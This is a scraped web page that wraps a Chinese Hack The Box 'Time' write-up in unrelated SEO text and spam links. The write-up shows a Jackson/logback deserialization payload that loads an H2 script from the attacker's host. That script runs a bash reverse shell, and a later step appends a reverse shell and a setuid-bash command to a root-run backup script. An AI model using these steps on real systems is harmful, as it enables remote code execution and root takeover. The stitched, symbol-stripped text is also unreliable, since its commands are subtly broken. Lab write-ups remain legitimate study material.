当前位置: 首页 > news >正文

花都网站建设信科网络中企动力z云邮箱

花都网站建设信科网络,中企动力z云邮箱,天津网站建站,企业内部网站模板下载HTB-Time 信息收集80端口 立足pericles - root 信息收集 80端口 有两个功能#xff0c;一个是美化JSON数据。 一个是验证JSON#xff0c;并且输入{“abc”:“abc”}之类的会出现报错。 Validation failed: Unhandled Java exception: com.fasterxml.jackson.core.JsonPa… HTB-Time 信息收集80端口 立足pericles - root 信息收集 80端口 有两个功能一个是美化JSON数据。 一个是验证JSON并且输入{“abc”:“abc”}之类的会出现报错。 Validation failed: Unhandled Java exception: com.fasterxml.jackson.core.JsonParseException: Unexpected character (‘’’ (code 39)): expected a valid value (number, String, array, object, ‘true’, ‘false’ or ‘null’) 根据报错可知是java jackson的报错。有关java jackson的漏洞非常多。其中有一篇文章提到几个负载。 [ch.qos.logback.core.db.DriverManagerConnectionSource, {url:jdbc:h2:tcp://10.10.14.31:4443/~test}]立足 新建一个文件名为inject1.sql。 CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {String[] command {bash, -c, cmd};java.util.Scanner s new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter(\\A);return s.hasNext() ? s.next() : ; } $$; CALL SHELLEXEC(bash -i /dev/tcp/10.10.14.31/443 01)python开启http.server。然后在验证功能下输入 [ch.qos.logback.core.db.DriverManagerConnectionSource, {url:jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT3;INITRUNSCRIPT FROM http://10.10.14.31:8000/inject1.sql}]pericles - root pspy64可以看到有一个timer_backup.sh没几秒种就会运行一次。 内容如下 #!/bin/bash zip -r website.bak.zip /var/www/html mv website.bak.zip /root/backup.zip以及/usr/bin/systemctl restart web_backup.service。 查找web_backup.service并查看内容 find / -name web_backup.service -type f 2/dev/null /etc/systemd/system/web_backup.servicepericlestime:/tmp$ cat /etc/systemd/system/web_backup.service [Unit] DescriptionCreates backups of the website[Service] ExecStart/bin/bash /usr/bin/timer_backup.sh因为隔几秒种会重启web_backup.serviceweb_backup.service服务又会运行/usr/bin/timer_backup.sh。 还有一个/bin/sh -c /usr/bin/systemctl restart timer_backup.timer不过我暂时不需要留在这备用。 我们能写入timer_backup.sh但是时间任务并没执行我写入的内容可能还有时间任务先对timer_backup.sh进行重置再运行。顺序是某个东西启动web_backup.serviceweb_backup.service启动timer_backup.sh。但是我没找到那个东西是什么。所以我决定再尝试对timer_backup.sh追加写入试试。向末尾添加cp /bin/bash /tmp/bash;chmod us /tmp/bash后等待片刻后仍无任何成功迹象。写入reshell到/usr/bin/timer_backup.sh里能成功。 echo -e \nbash -i /dev/tcp/10.10.14.31/4443 01 /usr/bin/timer_backup.sh但是几秒钟后就没了。 可以用echo “chmod us /bin/bash” 修改/bin/bash但为什么不能复制过来后再修改呢。 我不知道。
http://www.dnsts.com.cn/news/55186.html

相关文章:

  • 规划设计公司网站用vs代码做网站
  • 做邀请函的网站wordpress怎么增加菜单
  • 网站建设公司 合肥网站建设中可能遇到的问题
  • 网站规划与设计h5天津网站建设制作系统
  • wordpress开发门户网站基于html5的wordpress
  • 培训网站平台怎样做代理记账公司怎么找客源
  • 网站开发需求方案上海网络推广服务
  • 网站 ip修改备案流程图西宁网站建设报价壹君博贴心
  • 网站建设销售好做嘛北京广告制作公司
  • 做网站的框架有wordpress 中文
  • 海淀教育人才网站wordpress html音乐
  • 网站建设找超速云做带数据库的网站
  • 厦门蓝典网站建设seo点击排名源码
  • html中文网站模板科技有限公司经营范围
  • 贵州网络公司网站建设做sgs认证公司网站
  • wordpress支持微信小程序吗seo优化是怎么优化的
  • 山东建设机械协会网站云南站群网站建设
  • 校园二手交易网站开发微信端怎么建设网站
  • 湖南人文科技学院在哪个城市seo网站优化外包
  • 微信网站 详解广州番禺钟村
  • 中国网站排名wordpress菜单子分类
  • 网站支付功能怎么做电子商务网站建设的步骤
  • 湛江市建设规划局网站做暧暧xoxo网站
  • 网站建设下一步工作计划动漫制作专业烧钱吗
  • 个人网站设计步骤手机网站如何建立
  • 什么网站可以做电影投资西安专业seo
  • 上海建设工程招投标在什么网站宝塔wordpress安装
  • 网站建立需要哪些材料建筑图纸怎么学看图
  • 网站建设全部流程成都电话营销外包公司
  • 网站建设的成本分析服务器怎样建设网站